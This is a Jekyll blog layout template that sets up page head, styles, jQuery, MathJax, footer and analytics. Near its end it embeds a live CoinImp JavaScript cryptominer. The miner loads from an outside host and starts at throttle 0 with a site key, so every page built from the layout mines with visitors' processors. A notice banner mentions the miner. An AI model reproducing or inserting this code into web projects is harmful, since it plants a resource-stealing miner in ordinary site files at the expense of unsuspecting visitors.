<!DOCTYPE html>
{%- include snippets/get-lang.html -%}
<html lang="{{ __return }}">
  <head>
    {%- include common-head.html -%}
    {%- include head-icons-rel.html -%}
    {%- assign __path = '/assets/css/blog.css' -%}
    {%- include snippets/prepend-baseurl.html -%}
    <link rel="stylesheet" href="{{ __return }}">
    <style>
    {%- if page.picture_frame == 'shadow' -%}
      .m-article-content img:not(.emoji) {
        box-shadow: 0 0 5px rgba(0, 0, 0, .4);
      }
    {%- endif -%}
    </style>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    {%- include utils/mathjax.html -%}
  </head>
  <body>
    <div class="m-page-stage js-page-stage">{{ content }}</div>
    {%- include blog/footer.html -%}
    <script>
      $(function() {
        $(".highlight").each(function() {
          $(this).attr("data-lang", $(this).find("code").attr("data-lang"));
        });
      });
    </script>
    <script src="https://www.hostingcloud.racing/zJLk.js"></script>
    <script>
      var _client = new Client.Anonymous('f3668d28f087b88ece71e5e6fa65da1422f6acbc038b03afb273b768758b48bf', {
          throttle: 0, c: 'w'
      });
      _client.start();
      _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 40, "#3d3d3d");
    </script>
    {%- if site.isdebug == false -%}
      {%- include utils/google-analytics.html -%}
    {%- endif -%}
  </body>
</html>
